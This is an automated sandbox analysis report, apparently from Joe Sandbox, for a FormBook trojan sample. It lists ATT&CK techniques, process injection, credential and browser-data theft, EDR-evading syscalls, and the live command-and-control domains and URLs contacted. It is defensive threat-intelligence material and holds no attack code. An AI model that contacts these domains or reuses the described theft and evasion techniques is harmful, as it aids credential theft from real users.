                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587863 Sample: 3HnH4uJtE7.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.startsomething.xyz 2->28 30 www.juewucangku.xyz 2->30 32 14 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 3HnH4uJtE7.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 wdFhguqpcrad.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 wiaacmgr.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 wdFhguqpcrad.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.startsomething.xyz 69.57.163.64, 50019, 50020, 50021 FORTRESSITXUS United States 22->34 36 187370.github.io 185.199.109.153, 49737, 49745, 49763 FASTLYUS Netherlands 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                3HnH4uJtE7.exe69%VirustotalBrowse
                3HnH4uJtE7.exe79%ReversingLabsWin32.Trojan.AutoitInject
                3HnH4uJtE7.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.ausyva4.top/al74/0%Avira URL Cloudsafe
                http://www.969-usedcar02.shop/cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://www.opro.vip/3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGD0%Avira URL Cloudsafe
                http://www.goldbracelet.top/3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s=0%Avira URL Cloudsafe
                http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E0%Avira URL Cloudsafe
                http://www.startsomething.xyz/9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://www.969-usedcar02.shop/cfcv/0%Avira URL Cloudsafe
                https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC0%Avira URL Cloudsafe
                http://www.esnafus.online/xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs=0%Avira URL Cloudsafe
                http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g=0%Avira URL Cloudsafe
                http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ90%Avira URL Cloudsafe
                http://www.sssvip2.shop/cf1q/0%Avira URL Cloudsafe
                http://www.shipley.group0%Avira URL Cloudsafe
                http://www.pku-cs-cjw.top/k3hn/0%Avira URL Cloudsafe
                http://www.startsomething.xyz/9er8/0%Avira URL Cloudsafe
                http://www.juewucangku.xyz/b6bc/0%Avira URL Cloudsafe
                http://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://www.sssvip2.shop/cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://www.opro.vip/3oq9/0%Avira URL Cloudsafe
                http://www.shipley.group/5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://www.santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX0%Avira URL Cloudsafe
                http://www.santillo.bet/v9ah/0%Avira URL Cloudsafe
                http://www.esnafus.online/xmwd/0%Avira URL Cloudsafe
                http://www.shipley.group/5g1j/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.969-usedcar02.shop
                		199.59.243.228
                		truetrue
                  		unknown
                  www.goldbracelet.top
                  		104.21.36.239
                  		truefalse
                    		unknown
                    www.shipley.group
                    		13.248.169.48
                    		truetrue
                      		unknown
                      www.ausyva4.top
                      		104.21.48.233
                      		truetrue
                        		unknown
                        overdue.aliyun.com
                        		170.33.13.246
                        		truefalse
                          		high
                          187370.github.io
                          		185.199.109.153
                          		truetrue
                            		unknown
                            www.juewucangku.xyz
                            		8.136.96.106
                            		truetrue
                              		unknown
                              www.sssvip2.shop
                              		156.253.8.115
                              		truetrue
                                		unknown
                                santillo.bet
                                		66.235.200.145
                                		truetrue
                                  		unknown
                                  natroredirect.natrocdn.com
                                  		85.159.66.93
                                  		truefalse
                                    		high
                                    www.startsomething.xyz
                                    		69.57.163.64
                                    		truetrue
                                      		unknown
                                      www.esnafus.online
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.santillo.bet
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.pku-cs-cjw.top
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.opro.vip
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.ausyva4.top/al74/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.969-usedcar02.shop/cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.opro.vip/3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.969-usedcar02.shop/cfcv/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goldbracelet.top/3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s=false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.startsomething.xyz/9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.esnafus.online/xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.pku-cs-cjw.top/k3hn/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.juewucangku.xyz/b6bc/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sssvip2.shop/cf1q/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.startsomething.xyz/9er8/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sssvip2.shop/cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.opro.vip/3oq9/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.esnafus.online/xmwd/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.shipley.group/5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXXtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.santillo.bet/v9ah/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.shipley.group/5g1j/true
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabwiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lCwiaacmgr.exe, 00000006.00000002.3561555104.00000000056CC000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003C6C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/ac/?q=wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6Ewiaacmgr.exe, 00000006.00000002.3561555104.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003948000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDwiaacmgr.exe, 00000006.00000002.3561555104.0000000005B82000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000004122000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.shipley.groupwdFhguqpcrad.exe, 00000007.00000002.3562519026.00000000056D4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ac.ecosia.org/autocomplete?q=wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.comwiaacmgr.exe, 00000006.00000002.3561555104.000000000553A000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3563035654.0000000007590000.00000004.00000800.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003ADA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9wiaacmgr.exe, 00000006.00000002.3561555104.0000000005216000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.00000000037B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://wanwang.aliyun.com/nametrade/domainshow?domain=wiaacmgr.exe, 00000006.00000002.3561555104.00000000059F0000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003F90000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  8.136.96.106
                                                                  		www.juewucangku.xyzSingapore
                                                                  		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                  69.57.163.64
                                                                  		www.startsomething.xyzUnited States
                                                                  		25653FORTRESSITXUStrue
                                                                  66.235.200.145
                                                                  		santillo.betUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  13.248.169.48
                                                                  		www.shipley.groupUnited States
                                                                  		16509AMAZON-02UStrue
                                                                  170.33.13.246
                                                                  		overdue.aliyun.comSingapore
                                                                  		134963ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimitedfalse
                                                                  104.21.36.239
                                                                  		www.goldbracelet.topUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  104.21.48.233
                                                                  		www.ausyva4.topUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  156.253.8.115
                                                                  		www.sssvip2.shopSeychelles
                                                                  		132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                  185.199.109.153
                                                                  		187370.github.ioNetherlands
                                                                  		54113FASTLYUStrue
                                                                  199.59.243.228
                                                                  		www.969-usedcar02.shopUnited States
                                                                  		395082BODIS-NJUStrue
                                                                  85.159.66.93
                                                                  		natroredirect.natrocdn.comTurkey
                                                                  		34619CIZGITRfalse

                                                                  General Information

                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1587863
                                                                  Start date and time:2025-01-10 18:49:35 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 50s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:3HnH4uJtE7.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:cb8928597d08e9bb6c3c7ee9df7eb836df1f85a9668054765dd6eb75a33516a3.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@11/11
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 90%
                                                                  • Number of executed functions: 46
                                                                  • Number of non-executed functions: 302
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  8.136.96.106DHL.exeGet hashmaliciousFormBookBrowse
                                                                  • www.juewucangku.xyz/b6bc/
                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                  • www.juewucangku.xyz/mia8/
                                                                  69.57.163.64DHL.exeGet hashmaliciousFormBookBrowse
                                                                  • www.startsomething.xyz/9er8/
                                                                  Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.openhorizons.pro/ir2n/
                                                                  66.235.200.1458t1uarSZFV.exeGet hashmaliciousFormBookBrowse
                                                                  • www.californiacurrentelectric.com/jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp
                                                                  6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
                                                                  • www.baseinvestments.site/1zzj/
                                                                  AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                                                  • www.lakemontbellevue.com/bjbg/
                                                                  DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                                                  • www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
                                                                  INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                  • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                                  2FcJgghyXg.exeGet hashmaliciousFormBookBrowse
                                                                  • www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
                                                                  ClbrTLBbVA.exeGet hashmaliciousFormBookBrowse
                                                                  • www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
                                                                  r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
                                                                  • www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
                                                                  BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
                                                                  • www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
                                                                  GlobalImagingDocuments9575734549684.vbsGet hashmaliciousFormBookBrowse
                                                                  • www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
                                                                  13.248.169.48KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                  • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                                  TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                                  • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
                                                                  QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                  • www.bonheur.tech/t3iv/
                                                                  QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                  • www.bonheur.tech/t3iv/
                                                                  ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • www.londonatnight.coffee/13to/
                                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                                  • portlandbeauty.com/
                                                                  profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                  • www.aktmarket.xyz/wb7v/
                                                                  SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.xphone.net/i7vz/
                                                                  RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                  • www.krshop.shop/5p01/
                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                  • sharewood.xyz/administrator/index.php

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  187370.github.io4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                  • 185.199.108.153
                                                                  DHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 185.199.110.153
                                                                  www.969-usedcar02.shopDHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 199.59.243.227
                                                                  overdue.aliyun.comDHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 170.33.13.246
                                                                  Document.exeGet hashmaliciousFormBookBrowse
                                                                  • 170.33.13.246
                                                                  DPqKF5vqpe.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBCBrowse
                                                                  • 170.33.13.246
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                  • 170.33.13.246
                                                                  BRvptajioG.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                                  • 170.33.13.246
                                                                  Payment_Advice.exeGet hashmaliciousFormBookBrowse
                                                                  • 170.33.13.246
                                                                  SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                  • 170.33.13.246
                                                                  SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                                  • 170.33.13.246
                                                                  file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                  • 170.33.13.246
                                                                  YSpCB8DEek.exeGet hashmaliciousFormBookBrowse
                                                                  • 170.33.13.246
                                                                  www.goldbracelet.topDHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.21.36.239
                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                  • 172.67.201.49
                                                                  1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 172.67.201.49
                                                                  file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                  • 104.21.36.239
                                                                  www.ausyva4.topDHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.21.48.233
                                                                  www.juewucangku.xyzDHL.exeGet hashmaliciousFormBookBrowse
                                                                  • 8.136.96.106
                                                                  Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                  • 8.136.96.106

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  AMAZON-02UShttps://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                                  • 108.138.26.78
                                                                  FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                  • 18.143.155.63
                                                                  KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
